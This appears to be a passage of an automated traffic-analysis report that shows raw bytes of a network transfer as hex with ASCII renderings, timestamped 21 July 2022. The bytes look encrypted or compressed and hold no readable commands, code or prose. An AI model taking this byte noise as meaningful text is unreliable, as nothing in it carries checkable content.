                                                                              Data Ascii: 9&>mv7x.H\1#_p{{emiU:q;s$xqn.+qGz\Kh@pq}[;difgf|[@`LAq(cVSNa+h=|.xOmDq"sju>0o/Q{~r+3.R,K=
                                                                              2022-07-21 13:29:06 UTC37INData Raw: ab f6 d4 31 11 ff 2f e7 91 fb 11 40 ed 79 58 c0 e1 af ce 6e 87 c6 06 52 2c 10 c2 a8 e8 3f 04 02 6b 02 77 a0 bf 07 9b 72 9d 3a f6 ac e8 e2 a5 f2 4c 1f d2 b6 79 6c 2c d3 d7 71 02 93 2a 8e 71 f0 9e 05 8c ea 48 39 ca 0e 18 a3 f5 da eb 61 f6 f0 0a 33 4a 6e 3f ef 07 5a 7c cb de 2d ea 2e 4f a4 5b 96 e6 fa f5 64 aa 65 93 69 af 3f 5f af d3 52 20 ae 5f d0 5a 85 77 ac 7b 12 d3 96 e0 ef b2 c6 7b c8 f1 38 c5 63 3d f0 ad 2e 15 29 83 78 93 aa a1 0c 69 cf f4 29 58 25 da e6 a5 99 d3 6c 70 03 64 90 20 9c 3a e2 4d 0b 86 93 f9 a4 71 72 2a 32 d8 4a a2 e0 34 2f dc 8d ff 32 e6 4a 17 b7 a2 4a 77 1e 8e c7 24 ca cc 3f 94 08 3c 23 92 06 27 8c 6c 1a c1 bc 0b 4c b7 2e 33 a3 80 eb 95 53 7e 42 4f 78 ee 4b 25 3d 7d 6f e2 e5 71 5c 48 59 80 05 54 cc 64 66 68 e6 93 07 b5 75 ba e6 48 ad 94
                                                                              Data Ascii: 1/@yXnR,?kwr:Lyl,q*qH9a3Jn?Z|-.O[dei?_R _Zw{{8c=.)xi)X%lpd :Mqr*2J4/2JJw$?<#'lL.3S~BOxK%=}oq\HYTdfhuH
                                                                              2022-07-21 13:29:06 UTC38INData Raw: a4 43 dd ab 8a 02 e6 70 e1 52 48 f8 bd df ce 93 9f 62 39 01 06 11 b3 a3 bc a4 6f 21 94 fb 52 13 a0 1c eb 92 66 5d 19 66 d9 59 e3 60 7b 8b 76 e6 51 3e 86 a5 2e 03 86 8f 9e 94 17 88 83 a5 fb 20 b1 27 c1 6d 53 d7 60 0b ee 23 34 bd a7 62 b0 be a1 50 94 06 7e 32 82 7d 6a 97 78 2b 2b 6f 9d a9 9f f3 ed fa 29 2c ea de 7c b6 a1 84 70 d5 e0 17 a9 67 58 ba 73 6e 44 fc 96 27 17 b3 a0 e0 a3 d0 79 8a c6 40 b4 67 92 99 e5 60 ce cc 51 a6 88 33 e4 00 ea bf 6e d8 40 c1 7d 0c 71 ae 04 bc e9 25 a1 19 15 59 c5 ef 0e 62 31 5d d3 b9 20 fd 62 04 5f f7 73 8f 8f 8e b2 79 0d fc 65 ff bc a3 e2 76 50 a0 9d 37 61 db 50 59 58 b1 81 3f 88 b8 e5 74 f3 5f d8 af a7 e3 67 bc 36 d9 bc 7e 07 ff a2 74 9d 22 4b cb 5e e5 5d 67 3b 47 d0 bd 16 11 7f a5 6d c8 a6 85 66 bb c9 73 ab 12 d1 23 53 02 69
                                                                              Data Ascii: CpRHb9o!Rf]fY`{vQ>. 'mS`#4bP~2}jx++o),|pgXsnD'y@g`Q3n@}q%Yb1] b_syevP7aPYX?t_g6~t"K^]g;Gmfs#Si
                                                                              2022-07-21 13:29:06 UTC39INData Raw: 61 e8 4e c7 79 10 16 c5 e4 2a 73 6e ad b2 62 ca cf 7c d2 79 15 73 2c 9d 92 d3 a7 ff 18 09 bc 64 88 dc 25 dc a5 46 bc d4 85 3c f4 61 ca 8c e1 32 99 59 30 0e fc 08 e7 98 e4 03 8e e8 55 85 d9 eb b0 a7 63 87 de 19 d7 63 3c c4 a4 91 5a 99 1c 6c 1d 68 d5 9f fb 8c 74 98 49 a1 b4 74 f9 aa 10 26 0e a4 3a 79 40 22 ef df 10 41 93 23 95 0c 80 9e 29 8f e3 73 2a 84 0e 18 b8 e5 2c 81 7f 86 88 f5 32 6c 4d 13 9a 97 50 71 c1 db 3d 7a 0f 33 e7 5c a9 f2 45 68 9a b3 68 91 1b fe 33 a1 aa 90 05 29 b9 53 7e ac 40 69 a6 79 60 81 68 e1 c7 a3 aa 7b 7d 94 ef 48 46 1b f7 c3 b2 09 24 89 1f 9f a9 58 62 d4 cb e3 29 2d 3a d3 e1 c3 00 2c 6d 56 6f 7e 9a 4f 05 24 f2 b9 19 ac 93 a9 ef 49 67 d1 a2 78 43 88 f9 88 7f dc 30 fe 21 e3 2f 02 d9 f3 c5 60 47 cb c1 5f 84 cc 3d 90 19 3b 77 86 6c fd f7
                                                                              Data Ascii: aNy*snb|ys,d%F<a2Y0Ucc<ZlhtIt&:y@"A#)s*,2lMPq=z3\Ehh3)S~@iy`h{}HF$Xb)-:,mVo~O$IgxC0!/`G_=;wl
                                                                              2022-07-21 13:29:06 UTC41INData Raw: 25 aa bd 6d 96 7d 58 99 80 36 ab 57 4a 00 7a 35 cb 81 2d c4 71 b2 70 f2 a1 74 14 e6 98 87 3c 9f d1 63 00 a5 d6 00 25 20 70 15 aa 75 29 ce 51 a4 43 d9 da f4 13 f6 72 90 e2 89 f8 b9 f7 cd af f6 aa 3b 7a c8 3b a0 97 bc cb 8d 20 94 f1 54 cd ac 25 d8 1f 7e 57 31 49 d3 5f ff 96 47 8b 0d 2a f3 38 95 8f 36 ff 81 6c 3c 92 09 d3 17 a6 fb 2c 07 4e 73 44 6c df 46 d3 5e 0d 03 95 e7 6a b2 d7 ef 56 8f 28 17 1e 82 7b c2 4f 64 05 45 6a 9f a9 52 13 f0 d2 6c 04 ea d9 c2 b0 21 47 70 de e4 32 b3 67 47 97 71 6e 25 fc 96 01 71 af e2 f1 a7 c6 52 de c7 5c 9d 90 93 37 e3 7b e4 a2 5a a6 9e 30 09 07 d1 ae 71 c7 4b d0 74 f6 64 8e 03 b4 92 a1 a5 0d 12 7a 86 c9 1c 66 10 71 db 93 29 f3 70 00 6f ee 72 a3 86 b5 da ec 0c fc 47 34 f1 84 e4 65 65 6a 82 3e 1a 14 46 a7 5d 9f f8 e3 83 b8 e6 79
                                                                              Data Ascii: %m}X6WJz5-qpt<c% pu)QCr;z; T%~W1I_G*86l<,NsDlF^jV({OdEjRl!Gp2gGqn%qR\7{Z0qKtdzfq)porG4eej>F]y
                                                                              2022-07-21 13:29:06 UTC42INData Raw: fd 75 3a 20 ad 87 c6 0b 2a 25 3f 8c b9 94 b1 b0 ac 38 3f 58 e5 a1 0d 89 4b 22 f5 cd 54 8c 14 2e 43 80 94 54 c1 fc 20 62 3a 53 3c cc 44 56 22 6d 07 4f eb 65 47 ef c5 e4 20 b4 5b 27 ba 79 34 df 54 c1 fa 6c c7 20 9d 91 df a0 72 78 25 bb 66 83 c1 a8 c8 ba 4f aa 47 f4 13 f5 4d c9 a8 c9 a9 86 79 5f a7 f4 05 ed b7 ea 01 61 e3 6d a8 3b e3 af ab 78 0a d0 04 29 63 04 d6 b8 af d9 05 02 6b 35 70 ca 90 0f e2 ef 9e 41 b2 8a f9 ed ab 17 32 2f 46 c6 78 6a 30 78 d2 0a 4c 92 3e 9e 16 56 07 05 86 eb 62 53 84 0e 12 c8 5d 20 81 7c bf 93 00 2c 60 27 8e 81 88 51 5a d0 d9 34 80 16 85 80 8f 90 8c b0 b1 72 ac 0a 29 13 e1 35 48 71 af 14 32 a0 6d 6b 30 5f 64 ad 68 67 f2 26 e1 eb a4 b3 56 c8 08 38 c5 63 08 fb d3 b2 01 12 0b 16 80 a2 a0 72 f6 a1 44 22 32 3c c8 f0 c6 79 da 6d 7a 67 06
                                                                              Data Ascii: u: *%?8?XK"T.CT b:S<DV"mOeG ['y4Tl rx%fOGMy_am;x)ck5pA2/Fxj0xL>VbS] |,`'QZ4r)5Hq2mk0_dhg&V8crD"2<ymzg
                                                                              2022-07-21 13:29:06 UTC43INData Raw: 16 18 b8 e6 a5 12 aa d2 8d 32 f6 dc d8 ae 16 82 08 98 f2 09 6a eb 49 ef 67 0e d4 45 e2 c7 68 34 1c 73 cf 2a 31 ea 60 54 77 ab 52 de 62 d5 d2 73 a8 c6 ad f9 aa 5c 87 e5 13 fb 57 40 03 2b ec fb 82 29 e9 54 4c 77 60 a1 74 03 83 39 ad 27 95 c2 1b 55 a5 fa 08 1b 01 70 12 a7 bb 2b e2 0c b3 48 d9 ae ec ed e6 5c e9 04 8b d3 5e d9 cf 81 ca 78 39 01 04 13 49 93 bf a2 0b 21 87 cb 5d 13 8a 0d f5 1f 06 5d 19 76 c5 54 de 53 47 8e 61 1e f2 14 93 95 18 01 81 9f c2 93 23 a2 aa ac fb 21 0b df d9 69 6e fe 62 26 af 3d 39 89 94 bd b0 b8 09 7c fd 2c 44 fd 82 7b cc bd 65 29 6b 7a e0 62 3d f5 f4 d0 11 e4 ea d8 da df 5f 47 70 df ce 3d ba 57 49 8a 37 6e 24 fc 96 27 71 b3 a2 d9 a2 db 52 d4 c4 51 d0 49 93 b5 e5 78 cc 37 5a a6 85 08 11 29 3c bc 76 d5 33 7d 66 f2 7a f8 11 a8 b4 ba a4
                                                                              Data Ascii: 2jIgEh4s*1`TwRbs\W@+)TLw`t9'Up+H\^x9I!]]vTSGa#!inb&=9|,D{e)kzb=_Gp=WI7n$'qRQIx7Z)<v3}fz
                                                                              2022-07-21 13:29:06 UTC44INData Raw: 56 fe 0b d6 f3 10 f4 b9 d7 65 22 c5 8a 51 40 7e bd cf c9 74 6c 1c 78 e1 f1 9c 24 82 3a 9c 05 e2 f1 79 80 77 0a af 19 ba 9e 51 6b 77 81 41 ca 1d 75 2e 26 c2 35 c6 18 10 0b 2c db b1 85 b6 dd 7a 57 27 4f ee 80 5d 38 4d 3a 01 c0 a6 9e 05 59 a8 34 95 5e be fe b5 bf a5 58 25 c7 56 49 c5 85 17 63 e3 78 47 43 c5 e4 2c 72 68 ad bc 6e ca cf 7c d4 78 14 6f 26 8b 65 cd 86 03 0e 2e bb 6b 8a 34 b8 ef a9 60 be f6 24 e8 f5 4d d0 be da a2 43 59 30 11 8e 05 e7 80 ed 19 75 d1 b5 80 c1 e1 af bc 6b 9e 29 05 05 69 13 c0 df 68 41 05 04 6a 07 72 cf 90 14 88 43 61 40 94 a6 ef e0 c7 c7 26 07 b9 d8 6b 69 26 e4 d0 17 b2 92 06 83 0a 11 cb 05 86 eb 54 51 81 0e 09 a2 f4 df 80 5a 8e 85 2e cd 47 b9 38 80 8e 28 29 c1 d2 2f f7 58 1f ef 54 9d 93 b3 84 60 aa 74 94 05 1f 3e 73 a8 a4 1e 24 ae
                                                                              Data Ascii: Ve"Q@~tlx$:ywQkwAu.&5,zW'O]8M:Y4^X%VIcxGC,rhn|xo&e.k4`$MCY0uk)ihAjrCa@&ki&TQZ.G8()/XT`t>s$
                                                                              2022-07-21 13:29:06 UTC46INData Raw: 7a 91 e9 ca b4 88 dd 6c 4a c0 66 db 52 17 79 0a 80 a2 87 1a 86 57 23 ba 49 81 37 55 50 1a d9 b0 39 49 a0 ab c0 c3 23 75 19 c9 39 62 6c be 24 d3 19 cf ec b6 16 a3 fe b5 32 f6 ca d4 4f 08 50 0b ac f3 18 66 e7 61 fd 40 13 e3 5d f9 c0 61 d1 02 7d 33 00 1f cf 81 47 54 d2 97 df 68 dc ae 25 b7 e5 b4 8d 7d 4d 9c f0 ad 54 56 6c 09 10 f4 da 87 ff d5 5f 53 44 04 ba 74 03 8e 2d a8 c2 94 e9 02 a9 b5 dd 22 c6 0b 70 1f a2 43 35 e1 1d bf 43 c8 b2 eb 08 19 71 c7 25 98 f3 a7 0d df 8e fd bc 2a 1a 02 2a bb 8c 8c 5a 20 0d 84 ea 5b 3b 5b 0d f5 19 47 d6 e4 98 2c 40 c1 5b 5c 89 67 fb ec 2e 6f 8c 3f 0f 84 98 37 ba 64 a1 bd ad e8 34 0c 36 cb 5e 6c c4 7b 12 59 db 2f b9 ed 71 bb a2 d5 45 84 31 29 23 99 7b d9 8a 7b 0e 97 6c b1 a1 3f e4 fb fa 01 2f ea d2 cd ba 3e 49 63 ce e4 2c b2 78
                                                                              Data Ascii: zlJfRyW#I7UP9I#u9bl$2OPfa@]a}3GTh%}MTVl_SDt-"pC5Cq%**Z [;[G,@[\g.o?7d46^l{Y/qE1)#{{l?/>Ic,x
                                                                              2022-07-21 13:29:06 UTC47INData Raw: b1 e5 8c 1c 0c b6 f7 66 18 08 d4 ef 0a d3 dd d4 36 bb 26 8d f6 01 0d 5e 84 3a 9a 09 3a 8a e6 8f e4 d8 ac bc 28 1c b7 b5 58 61 23 2f 77 c5 ea 7a f6 c6 cd f8 04 e6 bc d7 65 2c ee 92 b8 ac 86 84 e6 d8 73 79 28 3f c3 f0 9c 28 36 05 99 14 ef 30 25 82 a5 0b af 12 36 8f 56 7c a1 92 46 39 f8 6a 03 0a 1e 23 c5 85 97 1e f6 8e bc 96 be 8c 5c 46 32 48 ed ba 66 29 42 b3 ee c7 9b 98 97 57 f7 24 90 45 c3 c0 b0 ae af c3 2d ca 47 46 4d 1a 8a 5e e3 69 fe a1 cd f5 22 79 6e 9c 6f 0a e7 cf 50 dc 73 16 7e 28 8c 9f a3 78 01 19 2f a8 67 81 c3 a8 c6 c4 99 bc dd 91 d1 f9 5c c8 9f d4 8a 64 59 30 17 e6 0f f6 9b f1 d4 65 f8 70 ac c6 f0 a6 c2 33 87 d7 0e f5 49 17 d4 21 a8 41 05 03 4b 1b 4b ca 90 05 8c 48 9f 41 ba ac 44 e6 9c cf 26 0b bd c4 78 6c 3d c5 d1 0a f8 93 2a 8a 82 7e 9f 14 82
                                                                              Data Ascii: f6&^::(Xa#/wze,sy(?(60%6V|F9j#\F2Hf)BW$E-GFM^i"ynoPs~(x/g\dY0ep3I!AKKHAD&xl=*~
                                                                              2022-07-21 13:29:06 UTC48INData Raw: b4 ca 22 70 5c 40 20 d1 09 4b 80 11 d5 7f 89 eb 2e 7e 7e 9c eb 34 39 97 8b db c5 56 5b 21 f8 c4 99 8a 69 81 b2 68 65 bb e8 a6 e6 cc be 0a d3 8e 86 da d0 8d 75 c7 ba 53 da 71 f4 51 da 6a 13 8a ba 8b ec af be 29 ab 48 83 2e 92 4b 0b 10 bd 22 43 a7 ab d3 f4 c0 8a 18 ef 3a 71 75 af da 05 10 de e1 b4 0b 94 1c a7 29 fc d7 de 58 0d 78 19 88 e8 0e e3 4a a6 e6 91 1b 19 59 34 4d 5f ca 1d 5e de 05 22 c6 92 5e 4e fe 44 cf 6c 58 0a 09 5e c6 a7 9c 62 6c 0a c0 9f aa 56 53 07 08 df c5 01 29 c6 67 77 04 f7 a0 74 18 86 39 97 37 e1 00 0c ab a5 d5 1b 09 1b 79 66 92 44 2a c8 11 94 6b 8d ab f4 15 88 56 ea 2f 8f eb b8 05 91 94 e9 8c 35 10 09 4f 99 93 bf a5 4e 7c 94 fb 54 cf 8b 47 fc 3f 77 dd 19 67 e0 64 86 a9 46 89 7c f3 ff 29 9d f9 d6 01 86 88 3f 83 05 b1 b4 d4 d8 27 13 27 c7
                                                                              Data Ascii: "p\@ K.~~49V[!iheuSqQj)H.K"C:qu)XxJY4M_^"^NDlX^blVS)gwt97yfD*kV/5ON|TG?wgdF|)?''
                                                                              2022-07-21 13:29:06 UTC50INData Raw: 67 3b d0 c6 b0 3f 7d 6c aa 55 92 ab 92 98 ba f4 7e ac 0a 2f 2b 67 f2 79 7f bd 15 07 14 f2 13 3f a2 f0 18 2b 71 28 71 22 be 71 59 a4 ba d4 f6 6d fc 1c 3a 27 ae e3 1a c5 08 c5 ea 19 cf 09 d1 3a b5 b7 81 e0 d1 9d b9 9b 2f 8b 75 eb 9a e9 9a f1 39 ed 1d 0a 0d bb ae db 5c 7a 6d fa ea f5 63 e4 da c8 e0 08 96 7f 29 64 0a ee 85 a7 a9 a9 50 e3 c9 7e ea 4f 17 11 f0 8f 27 b5 06 8f 0a e8 3e 76 b5 79 f4 ae 34 a4 8f 5b 7d ed a9 50 28 ff 7f 37 24 cd 26 c8 0b 31 06 33 97 4f 84 9a aa 68 51 27 5e cd 61 63 38 40 3d f4
                                                                              Data Ascii: g;?}lU~/+gy?+q(q"qYm:':/u9\zmc)dP~O'>vy4[}P(7$&13OhQ'^ac8@=
                                                                              2022-07-21 13:29:06 UTC50INData Raw: d2 85 90 17 39 74 38 6b 55 e7 dc a4 b3 b1 c2 05 d0 54 4e dc 64 18 5c e4 7e 39 bd da ed d4 69 4f 8e aa 72 2c 54 78 c7 60 1f 65 f1 91 9b cc b1 29 0d 25 bb 66 b8 6a b9 c3 a1 3f b0 dd 9b d9 e6 4a dc 84 cb ad 99 48 3f 0e ec fb e6 bd d7 1b 7d fd 51 d1 c3 e1 a9 ba e3 80 d7 04 28 71 1e d3 a2 91 50 0f 18 fb 35 70 ca 90 0f 2f 49 91 55 ac bb fe ce 27 1d 26 0d a2 de 6b 63 26 e4 da 1d b2 92 06 89 1a 6d 90 05 97 ee 55 59 7a 0f 34 8c e8 09 e6 77 99 88 02 1b e7 48 38 8a 99 5d 7e e9 37 24 84 04 1d c7 bb 91 8c b0 86 6d 82 fc 91 12 eb 4c 71 aa bc 0b 2b b1 49 d9 3f 5f 75 a4 61 97 9c ba f5 e9 dd 4a 6d a7 89 56 22 68 1b fd 4e eb 14 29 88 05 88 bb b5 6c f8 df fb 3c 20 c8 df cd e0 07 d7 76 f6 3c 69 97 4e 24 c3 e2 47 12 97 1d d3 ea 71 73 06 a5 87 4b a8 c2 5b 7a dc 87 e9 f7 6e 6c
                                                                              Data Ascii: 9t8kUTNd\~9iOr,Tx`e)%fj?JH?}Q(qP5p/IU'&kc&mUYz4wH8]~7$mLq+I?_uaJmV"hN)l< v<iN$GqsK[znl
                                                                              2022-07-21 13:29:06 UTC51INData Raw: 5f e7 d8 1f 1d 1c 5f c7 10 36 d9 ec 8e 5e fa 58 d6 6b b9 ef 21 a8 cc b4 92 6c 59 e8 04 9e aa 5d 53 05 10 f8 da 85 3f d7 50 c2 c0 78 7b 75 12 9f 39 58 26 84 c0 63 47 a5 d6 00 0a 65 9d 14 b1 4f f6 10 04 ad 6f df a0 9b 4e e7 70 e1 f3 8e d0 f4 db cc 8f c8 a0 39 00 1e 3b a0 91 bf 9b 21 3b cd fb 50 13 a0 0d f5 1d 7e 53 19 3c ba 5f ff 48 47 89 76 fb c3 3c 91 0a 13 01 86 00 3c 92 1e b4 b6 d4 12 27 13 2b d4 36 86 d4 60 07 41 2c 26 9d e3 0f 77 b9 03 5c e0 7c 3f 30 88 14 1a 91 64 09 7a 6b ee 7b 3c f5 fa c1 6f 3f ef c9 d8 df f4 46 70 df f5 38 b1 08 9c 8b 71 64 35 f9 8e 48 a9 b2 a0 fb bd d8 3d 8c c6 47 a7 8a 97 a4 e4 14 0f d7 5a ac 9c 23 0b 06 d7 b9 60 c2 44 48 d0 9d aa 83 15 b4 8d 6c ba 08 1a 16 78 c9 0e 68 0b 1c 24 92 3b fc be dd 4d 00 5e a5 89 e3 80 ee 0c f6 b3 d8
                                                                              Data Ascii: __6^Xk!lY]S?Px{u9X&cGeOoNp9;!;P~S<_HGv<<'+6`A,&w\|?0dzk{<o?Fp8qd5H=GZ#`DHlxh$;M^
                                                                              2022-07-21 13:29:06 UTC52INData Raw: a2 0c 9b 19 79 b3 64 a7 77 03 b8 e6 ab b2 53 73 7a 81 48 32 01 74 10 33 ca 23 c0 11 b1 95 37 90 b1 8c ad 59 7b 7b 3e 51 f2 ac 79 a9 d6 3e f2 c1 83 88 f8 37 47 3a 97 57 b5 bd b5 bf a3 3d 2d cd 56 48 d7 62 1b 4f e2 63 d6 b3 e9 ec 22 71 64 b0 2a e5 2a c3 50 df 79 e1 6e 0d 94 81 41 85 01 19 24 b7 76 9d ca b0 d5 55 4a 90 df 8c cf f5 44 dd 70 d9 8e 9b 72 35 29 8b fa 18 6e f3 1c 58 2c 78 80 cb cb af ad 6e 94 e7 01 29 10 10 c2 ac 0c 41 05 13 1f 0c 60 ca 9a 08 9f 5b 9c 45 ae 84 29 e6 ba 1b 35 02 ac c1 6e 92 25 fe d2 26 5b bb d7 88 02 78 8e 00 0a 67 4a 42 85 26 d3 a6 ea 2b f2 99 98 82 01 49 68 8e 39 80 82 5e 13 93 d2 25 8e 04 16 91 33 90 8c be 91 63 24 d2 87 3a 25 3f 5f ad af 08 30 ab 43 34 33 53 6c 87 6e 41 60 94 e0 ed bf a9 e0 21 83 39 c4 41 d0 f6 c2 b4 67 c6 88
                                                                              Data Ascii: ydwSszH2t3#7Y{{>Qy>7G:W=-VHbOc"qd**PynA$vUJDpr5)nX,xn)A`[E)5n%&[xgJB&+Ih9^%3c$:%?_0C43SlnA`!9Ag
                                                                              2022-07-21 13:29:06 UTC53INData Raw: 92 43 11 cc 7e 26 52 a0 a1 f3 c8 05 8b 12 cd 97 60 7d bf 78 1a 18 cf fd a8 77 b0 d9 a6 32 fa f3 9e 50 17 a4 02 ef 3e 08 6d f7 bc 30 5a 29 eb 63 e2 c0 7a d9 18 4b c6 29 1d c1 83 5c 81 fa 55 f4 68 d6 fc 3d a8 c6 a7 96 7d 5c 92 ef 9f aa 65 41 02 01 b8 ca 81 29 d7 54 4c 77 0a a1 74 13 8e 02 8f 3c a0 c4 0c ab 34 d6 0a 12 79 a4 14 b1 4f 26 c6 1a 8c bd db a9 f2 04 6a 77 eb 2f 88 eb b9 ca c8 93 e1 02 28 05 16 2f 88 61 be a4 2b 29 80 d3 a1 11 a0 0b e2 92 79 5d 19 66 c0 5b e4 4c 51 9e fa 21 f3 38 90 2f 02 05 92 9d 14 60 0e a0 b7 af ef 0e 13 22 d8 43 7b 58 67 0d 4c 24 3d 91 f6 64 a6 bc a1 47 8b 3a 2b 18 70 7a c8 9b 6c 17 41 6c 9e af 3b e2 7d d5 6a 2e eb cb da a1 25 51 67 59 26 3d a9 66 e9 9b 75 7a 30 d4 64 26 71 b9 a8 e5 9d d9 51 de c0 51 20 9e 93 b5 e0 6f f0 c2 72
                                                                              Data Ascii: C~&R`}xw2P>m0Z)czK)\Uh=}\eA)TLwt<4yO&jw/(/a+)y]f[LQ!8/`"C{XgL$=dG:+pzlAl;}j.%QgY&=fuz0d&qQQ or
                                                                              2022-07-21 13:29:06 UTC55INData Raw: 84 ea a7 ef bd f9 c4 ec 31 18 09 a4 bf 4b 74 37 70 c3 14 eb 56 e7 c4 c0 f2 0e 9e b8 46 0a 3a fc 94 a8 a0 bb 86 e9 c9 65 6d 01 0b ef f0 b0 2e bb 12 84 6a f2 2e 79 ac 68 17 bc 13 aa 8f 5a 74 43 7f 40 04 d9 7c 2b ed c5 5a da 0a 20 0f 2b f2 ac 84 b6 a1 15 a3 37 59 ef bc b8 57 bf 23 ff cb e5 8b 07 36 6d e3 98 4b fe c2 be bf b6 59 23 ff a8 4f f0 59 11 20 f6 7f 28 b4 c2 8b 37 69 63 ab d4 8d 35 ce 5a c1 ba 70 9a 20 9d 91 c4 c5 21 18 25 bd 73 a4 d9 b2 c3 ba 40 a3 f7 65 c3 d9 41 d2 89 c2 cd 83 58 30 17 ea 2e f4 9a fb 1b 7b f6 48 7e c0 cd a4 ae 67 90 01 95 3a 66 0f f0 bf 8c 41 14 09 7e 2b 9f cb bc 0c 9c 52 83 72 f4 b3 df f5 b1 1d 37 0c a7 3a 79 40 2e cd 54 09 4c 93 31 99 09 7e 8e 0e 99 a3 b4 43 a8 28 11 b0 3c 26 ee 6b 98 82 0d 34 2f 55 39 80 8e 34 88 c0 d2 2f 93 d4
                                                                              Data Ascii: 1Kt7pVF:em.j.yhZtC@|+Z +7YW#6mKY#OY (7ic5Zp !%s@eAX0.{H~g:fA~+Rr7:y@.TL1~C(<&k4/U94/
                                                                              2022-07-21 13:29:06 UTC56INData Raw: 56 5d 21 cf dc 8a aa 76 91 3f d3 65 bb f8 a3 e7 f6 a2 10 c5 93 6e c4 ec a7 9b cc ba 5e dd 87 ea 6d 0e 6e 10 9b ba 82 1a 86 57 2a 80 40 bb c4 81 38 15 c7 ae 2e 78 82 b8 d8 a1 01 8a 18 e1 1d 60 7d b5 1f 26 1a cf ce a5 03 bc 4c a6 29 e7 cd c4 7b 0c ae 0d 97 07 08 41 ff af e5 4b 0b d5 b0 e3 ec 72 dd 16 5f ca 19 cd c0 af 54 74 f8 79 3d 6a ad b8 20 a8 c2 8d b4 7f 5f fa ea 9e aa 53 6a 48 03 d7 dc 81 29 cc 56 3f 81 16 a1 7e 6f 91 33 86 38 bf de 3c a8 a4 6e 0b 03 0a e6 15 b1 54 59 af 0e a4 49 d5 da 95 13 e7 7a e1 2d f2 fa bc db c8 96 e5 b1 3e 1e 32 08 b1 9b 97 a7 22 21 92 94 3c 13 a0 07 d3 27 5c 5c 19 67 c2 58 ed 7b 1a 8b 0d e5 f2 38 95 9e 1a 17 95 81 17 8c 1e a9 ac af 6a 2b 15 09 dc 46 6c d3 69 81 63 25 2e 94 88 97 b1 b8 09 70 9e 26 28 e6 91 73 d9 99 75 0a e7 da
                                                                              Data Ascii: V]!v?en^mnW*@8.x`}&L){AKr_Tty=j _SjH)V?~o38<nTYIz->2"!<'\\gX{8j+Flic%.p&(su
                                                                              2022-07-21 13:29:06 UTC57INData Raw: 2f 14 f7 0a cb a8 c3 0b 2e 73 32 73 28 a1 76 a2 bb 68 df cb 73 e6 8e 6d 0e b0 f4 0d c9 de a9 ec 07 db f3 cf 1f ac a3 8d e7 44 a9 a0 85 16 96 79 fc 51 f1 53 64 e8 ec 31 06 10 ae a7 4e 65 2d 6a e5 e0 14 7b ce 66 c8 f1 07 8b 15 df 64 26 f9 96 d5 b6 80 95 e6 c1 62 60 36 c9 10 f1 96 20 bc 69 95 04 e8 2b 7b bc 0a 00 ae 18 ae 97 57 bd 7a b9 8a 28 ff 75 3f 32 18 26 c3 0f 4f 0c 2d 9d bb ad bf a4 7a 51 20 71 d5 ab 62 32 5c 11 f0 c3 88 86 69 11 6a 35 93 29 c3 d0 b5 bb 8c 5f 3e ce 41 21 fb 7a 16 49 96 76 29 b2 c1 f5 2e 6a 18 ab ba 79 30 ff 4f d4 1b 17 6e 21 99 8d c4 a3 03 62 23 ba 6c 94 e2 67 c2 ab 41 b5 df e0 c4 f4 4d c7 58 d5 89 f4 5b 4b 19 f4 05 e3 87 f3 03 61 ed 51 5e c0 e1 a5 af 7f 83 aa 0d 28 62 14 c0 ae fc 47 04 02 65 60 6b cb 90 01 85 72 80 4a ab a9 e8 f7 bf
                                                                              Data Ascii: /.s2s(vhsmDyQSd1Ne-j{fd&b`6 i+{Wz(u?2&O-zQ qb2\ij5)_>A!zIv).jy0On!b#lgAMX[KaQ^(bGe`krJ
                                                                              2022-07-21 13:29:06 UTC59INData Raw: b1 15 dd 39 03 3e d7 8e e1 fb 79 17 1c 48 7f 84 7f 31 2c 77 a3 e5 fe 8f 5d 66 29 d4 88 7b c8 7e 0d 6c 8f fa 15 b2 7f 8d e6 3a c1 94 8f 03 d4 50 45 34 e8 53 8d 82 76 90 2c 43 74 bf ff a2 60 8c b9 10 c3 26 81 c1 d4 8d c0 c6 ba 53 e3 79 e9 41 06 e5 05 88 ba 9a f5 80 65 d6 aa 6e b8 36 85 5a 17 d1 23 2d 52 a0 bb c8 d9 14 8e 0e f3 bb 31 7d b5 0d b4 09 ca f2 8d 40 bd d9 ac 01 f6 d9 cf 5a 8b b1 03 93 fe 09 7c fa af 10 4a 20 c9 4c ca bb 71 ca 17 55 d4 12 34 c1 92 51 44 04 53 f2 4c c7 bb 37 ae d1 2a 91 7d 5c 86 e3 97 bc 4e cc 53 01 ff ca 23 21 d2 7c 0f 76 17 ab 5c 12 97 32 8c a0 89 d6 0b ab b5 d1 15 0a f4 71 39 b6 54 2c e4 11 ae 50 de a9 e5 14 fb 8e ea 03 ad e9 bb cc ca 92 6f a7 39 01 03 36 a9 85 a7 28 70 21 94 fa fc 1a b4 25 b6 1e 7e 57 31 67 d1 5f ff d4 5a 9a 71
                                                                              Data Ascii: 9>yH1,w]f){~l:PE4Sv,Ct`&SyAen6Z#-R1}@Z|J LqU4QDSL7*}\NS#!|v\2q9T,Po96(p!%~W1g_Zq
                                                                              2022-07-21 13:29:06 UTC60INData Raw: ac a0 e3 67 14 3d 3e be 05 b6 d4 b1 40 b3 00 d7 c8 23 d4 3b 67 3f 7c c6 b0 2e 78 4f a7 6d e0 af 92 98 b2 e5 71 a2 09 da 01 50 fc 6f 62 55 8e 03 07 ea 18 35 ae f9 f0 39 52 2a 77 26 a1 60 bf 5b 97 f2 e5 4a e6 a7 f5 05 ca da 08 ca 0c fe c7 04 d8 8a fe 17 bf a2 a7 84 43 99 49 84 3a 92 78 e8 f6 ef 87 e9 cd ee 35 7a 16 b5 b4 41 67 39 12 f1 e8 ea 70 dd b3 d7 ed 2f 5d 6e d7 6f a6 c8 95 ae bb 9e 8f ca 1d 74 66 14 97 27 f0 9c 26 80 07 ac 06 e8 9b 79 aa 77 94 af 18 bb 88 5d 53 d1 81 41 28 ff 7d 20 c5 c3 19 cf 23 69 08 2c 9b ba 98 ba a7 72 4c c8 58 c9 ac 4a 72 4b 22 f9 dd 86 90 0e 21 95 34 b9 56 d3 dd b5 b7 b9 ac 3d e0 58 30 e4 7a 16 4b fc 56 24 b0 c5 ee 35 61 6f ad b3 64 ca cf 7c d8 1e 27 6e 21 99 b3 f5 aa 01 13 09 e6 72 9c ca b1 db 55 4a 90 d1 b3 cf f7 4d c9 0e ef
                                                                              Data Ascii: g=>@#;g?|.xOmqPobU59R*w&`[JCI:x5zAg9p/]notf'&yw]SA(} #i,rLXJrK"!4V=X0zKV$5aod|'n!rUJM
